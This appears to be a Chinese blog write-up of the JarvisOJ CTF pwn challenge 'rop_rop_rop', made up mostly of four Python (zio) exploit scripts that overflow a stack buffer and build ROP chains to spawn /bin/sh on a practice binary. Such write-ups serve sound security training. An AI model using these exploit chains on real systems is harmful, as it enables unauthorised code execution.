[JarvisOj](pwn)rop_rop_rop


簡介 :

項目地址 : https://coding.net/u/yihangwang/p/pwnme/git(pwn題目及 writeup 匯總)
題目地址 : https://coding.net/u/yihangwang/p/pwnme/git/tree/master/lessons/jarvisoj/5

利用代碼 :

方法一 :
(按照出題人的思路 , 分別調用 Step1, Step2, Step3, 在內存中構造 /bin/sh , 然后調用 system)

#!/usr/bin/env python
# encoding:utf-8

import zio

payloadForStep1 =  "A" * 7 + "\x00" # 使用 0x00 繞過 strlen()
payloadForStep1 +=  "@" * 8 # 
payloadForStep1 +=  zio.l32(0x804871e) # Step1() 的地址
payloadForStep1 +=  zio.l32(0x804867d) # main() 的地址
payloadForStep1 +=  "\x00" * 4 # Step1 的參數(shù)3
payloadForStep1 +=  "AAAA" # Step1 的參數(shù)2
#payloadForStep1 +=  "\xd5\xc4\xb3\xa2" # Step1 的參數(shù) 1
payloadForStep1 += zio.l32(0xA2B3C4D5) # Step1 的參數(shù) 1

payloadForStep2 =  "A" * 7 + "\x00" # 使用 0x00 繞過 strlen()
payloadForStep2 +=  "@" * 8 # 
payloadForStep2 +=  zio.l32(0x8048766) # Step2() 的地址
payloadForStep2 +=  zio.l32(0x804867d) # main() 的地址
payloadForStep2 +=  zio.l32(0xFF25A7D4) # Step2 的參數(shù) 1
payloadForStep2 +=  "AAAA" # Step2 的參數(shù)2

payloadForStep3 =  "A" * 7 + "\x00" # 使用 0x00 繞過 strlen()
payloadForStep3 +=  "@" * 8 # 
payloadForStep3 +=  zio.l32(0x80487A3) # Step3() 的地址
payloadForStep3 +=  zio.l32(0x804867d) # main() 的地址
payloadForStep3 +=  zio.l32(0xFFFFFFFF) # Step3 的參數(shù) 1
payloadForStep3 +=  zio.l32(0xC0C0C0C) # Step3 的參數(shù)2
payloadForStep3 +=  zio.l32(0x9A829A82) # Step3 的參數(shù)3

Io = zio.zio("./rop_rop_rop")

Io.readline()
Io.readline()
Io.write(payloadForStep1)
Io.write("\n")

Io.readline()
Io.readline()
Io.write(payloadForStep2)
Io.write("\n")

Io.readline()
Io.readline()
Io.write(payloadForStep3)
Io.write("\n")

Io.interact()

方法二 :
(通過調用 GetUserInput() 函數(shù)將 "/bin/sh" 寫入指定內存地址 , 構造 system 的調用棧)
(得到蔚恒學長的指點 , payload 長度最短)

#!/usr/bin/env python
# encoding:utf-8

import zio

payload = "A" * 7 + "\x00" # 使用 0x00 繞過 strlen()
payload += "@" * 8 # 
payload += zio.l32(0x80485F2) # GetUserInput() 的地址
payload += zio.l32(0x8048480) # GetUserInput() 的返回地址 , 也就是 system 函數(shù)的地址
payload += zio.l32(0x804A04C) # GetUserInput() 的參數(shù) (在內存中找一段可寫的地址 , 用來存放 /bin/sh 這個字符串)
payload += zio.l32(0x804A04C) # system() 函數(shù)的參數(shù) , 為 /bin/sh 這個字符串的地址

Io = zio.zio("./rop_rop_rop")
Io.writeline(payload)
Io.readline()
Io.writeline("/bin/sh")
Io.interact()

方法三 :
(rop)

#!/usr/bin/env python
# encoding:utf-8

import zio

payload = "A" * 7 + "\x00" # 使用 0x00 繞過 strlen()
payload += "@" * 8 # 
payload += zio.l32(0x80485F2) # GetUserInput() 的地址
payload += zio.l32(0x804886B) # pop, ret 的地址
payload += zio.l32(0x804A04C) # GetUserInput() 的參數(shù) (在內存中找一段可寫的地址 , 用來存放 /bin/sh 這個字符串)
payload += zio.l32(0x8048480) # GetUserInput() 的返回地址 , 也就是 system 函數(shù)的地址
payload += zio.l32(0x804886B) # pop, ret 的地址
payload += zio.l32(0x804A04C) # system() 函數(shù)的參數(shù) , 為 /bin/sh 這個字符串的地址
payload += zio.l32(0x8048490) # exit() 函數(shù)的地址
payload += "\x00" * 4 # exit() 的返回地址 (程序已經結束就不必再關心)
payload += zio.l32(0x00) # exit() 的參數(shù) , 0

Io = zio.zio("./rop_rop_rop")
Io.writeline(payload)
Io.readline()
Io.writeline("/bin/sh")
Io.interact()

方法四 : (方法一的簡潔版本)

#!/usr/bin/env python
# encoding:utf-8

import zio

payload =  "A" * 7 + "\x00" # 使用 0x00 繞過 strlen()
payload +=  "@" * 8 # 
payload +=  zio.l32(0x804871e) # Step1() 的地址
payload +=  zio.l32(0x8048869) # pop,pop,pop,ret 的地址
payload +=  "\x00" * 4 # Step1 的參數(shù)3
payload +=  "AAAA" # Step1 的參數(shù)2
payload += zio.l32(0xA2B3C4D5) # Step1 的參數(shù) 1

payload +=  zio.l32(0x8048766) # Step2() 的地址
payload +=  zio.l32(0x804886A) # pop,pop,ret 的地址
payload +=  zio.l32(0xFF25A7D4) # Step2 的參數(shù) 1
payload +=  "AAAA" # Step2 的參數(shù)2

payload +=  zio.l32(0x80487A3) # Step2() 的地址
payload += "BBBB" # 已經執(zhí)行到 Step3() , 再如何跳轉已經無所謂了 
payload +=  zio.l32(0xFFFFFFFF) # Step3 的參數(shù) 1
payload +=  zio.l32(0xC0C0C0C) # Step3 的參數(shù)2
payload +=  zio.l32(0x9A829A82) # Step3 的參數(shù)3

Io = zio.zio("./rop_rop_rop")
Io.readline()
Io.write(payload + "\n")
Io.interact()
最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 229,327評論 6 537
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 98,996評論 3 423
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 177,316評論 0 382
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,406評論 1 316
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 72,128評論 6 410
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 55,524評論 1 324
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,576評論 3 444
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 42,759評論 0 289
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經...
    沈念sama閱讀 49,310評論 1 335
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 41,065評論 3 356
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,249評論 1 371
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 38,821評論 5 362
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發(fā)生泄漏。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 44,479評論 3 347
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 34,909評論 0 28
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,140評論 1 290
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 51,984評論 3 395
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 48,228評論 2 375

推薦閱讀更多精彩內容